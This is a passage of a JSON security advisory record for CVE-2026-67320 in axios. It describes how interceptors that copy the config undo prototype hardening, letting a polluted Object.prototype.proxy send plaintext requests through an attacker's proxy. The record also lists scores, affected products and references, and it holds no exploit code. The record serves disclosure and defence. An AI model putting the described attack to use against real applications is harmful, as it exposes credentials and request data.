https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/adapters/http.js#L816-L820\n  - Axios threat model for prototype-pollution read-side gadgets: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/THREATMODEL.md#L136-L144\n  - Existing proxy pollution regression test intent: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/tests/unit/prototypePollution.test.js#L1098-L1135\n</details>",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-gcfj-64vw-6mp9.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "axios in a Node.js deployment using the HTTP adapter can route requests through an attacker-controlled proxy. axios hardens merged request configuration by creating a null-prototype object, but request interceptors run after the merge; a common immutable interceptor pattern such as {...config} or Object.assign({}, config) converts the hardened config back into a regular object. axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads config.proxy through the prototype chain. If an attacker can pollute Object.prototype.proxy, affected requests can be routed through an attacker-controlled proxy. For plaintext HTTP requests, the proxy can observe Authorization headers, Basic auth from config.auth, method, absolute URL, Host, and request body, and can return its own response. This does not establish browser impact or HTTPS header/body disclosure under normal TLS validation. Affected versions are >=0.31.1 (fixed in 0.33.0) and >=1.15.2 (fixed in 1.18.0).",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-67320"
                },
                {
                    "category": "description",
                    "text": "axios in a Node.js deployment using the HTTP adapter can route requests through an attacker-controlled proxy. axios hardens merged request configuration by creating a null-prototype object, but request interceptors run after the merge; a common immutable interceptor pattern such as {...config} or Object.assign({}, config) converts the hardened config back into a regular object. axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads config.proxy through the prototype chain. If an attacker can pollute Object.prototype.proxy, affected requests can be routed through an attacker-controlled proxy. For plaintext HTTP requests, the proxy can observe Authorization headers, Basic auth from config.auth, method, absolute URL, Host, and request body, and can return its own response. This does not establish browser impact or HTTPS header/body disclosure under normal TLS validation. Affected versions are >=0.31.1 (fixed in 0.33.0) and >=1.15.2 (fixed in 1.18.0).\nA flaw was found in axios when used in a Node.js deployment with the HTTP adapter. This vulnerability, known as Prototype Pollution, occurs because request interceptors can revert hardened request configurations, allowing an attacker to manipulate the Object.prototype.proxy property. If successfully exploited, an attacker can route affected plaintext HTTP requests through a malicious proxy, potentially observing sensitive data such as authentication headers and request bodies, and even returning their own responses.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-67320.json"
                },
                {
                    "category": "other",
                    "text": "0.00304",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.3",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.3",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "Is related to an uncommon product vendor, The CVSS vector string contains AV:N (Attack Vector: Network), Is related to CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'))",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 4\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-8924481",
                    "CSAFPID-8924484",
                    "CSAFPID-8583063",
                    "CSAFPID-8600993",
                    "CSAFPID-8925638",
                    "CSAFPID-8925639",
                    "CSAFPID-8925640",
                    "CSAFPID-8925641",
                    "CSAFPID-8925846",
                    "CSAFPID-8925867",
                    "CSAFPID-6014972",
                    "CSAFPID-8476867",
                    "CSAFPID-8902830",
                    "CSAFPID-8902831",
                    "CSAFPID-9012403",
                    "CSAFPID-9012404",
                    "CSAFPID-9012405",
                    "CSAFPID-9012406",
                    "CSAFPID-9012407",
                    "CSAFPID-9012408",
                    "CSAFPID-9012409",
                    "CSAFPID-9012410",
                    "CSAFPID-9012411",
                    "CSAFPID-9012413",
                    "CSAFPID-9012414",
                    "CSAFPID-9033546"
                ],
                "known_not_affected": [
                    "CSAFPID-8924478",
                    "CSAFPID-8924482",
                    "CSAFPID-1409455",
                    "CSAFPID-1409456"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-2958.json"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/67xxx/CVE-2026-67320.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-67320.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-gcfj-64vw-6mp9.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-67320"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-67320"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-67320.json"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-2923.json"
                },
                {
                    "category": "external",
                    "summary": "Source - ncscclear",
                    "url": "https://vulnerabilities.ncsc.nl/manual/CVE-2026-67320"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/67xxx/CVE-2026-67320.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; nvd; osv; redhat",
                    "url": "https://github.com/axios/axios/commit/df53d7dd99b202fb194217abd127ae6a630e70dc"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; nvd; osv; redhat",
                    "url": "https://github.com/axios/axios/security/advisories/GHSA-gcfj-64vw-6mp9"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67320"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; nvd; osv; redhat",
                    "url": "https://www.vulncheck.com/advisories/axios-before-prototype-pollution-via-node-http-adapter"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/pull/11000"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/pull/11001"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/commit/1417285c69344bbcc6420a021f67dee0c6fedb2d"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/commit/32fc489632377d214db55bfa4e2c48486a7d7ce2"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/releases/tag/v0.33.0"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/axios/axios/releases/tag/v1.18.0"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-67320"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-2923.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2923"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://confluence.atlassian.com/security/security-bulletin-august-18-2026-1821999768.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-2958.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2958"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7284379"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 9.8,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-6014972",
                        "CSAFPID-8476867",
                        "CSAFPID-8583063",
                        "CSAFPID-8600993",
                        "CSAFPID-8902830",
                        "CSAFPID-8902831",
                        "CSAFPID-8924481",
                        "CSAFPID-8924484",
                        "CSAFPID-8925638",
                        "CSAFPID-8925639",
                        "CSAFPID-8925640",
                        "CSAFPID-8925641",
                        "CSAFPID-8925846",
                        "CSAFPID-8925867",
                        "CSAFPID-9012403",
                        "CSAFPID-9012404",
                        "CSAFPID-9012405",
                        "CSAFPID-9012406",
                        "CSAFPID-9012407",
                        "CSAFPID-9012408",
                        "CSAFPID-9012409",
                        "CSAFPID-9012410",
                        "CSAFPID-9012411",
                        "CSAFPID-9012413",
                        "CSAFPID-9012414",
                        "CSAFPID-9033546"
                    ]
                }
            ],
            "title": "CVE-2026-67320"
        }
    ]
}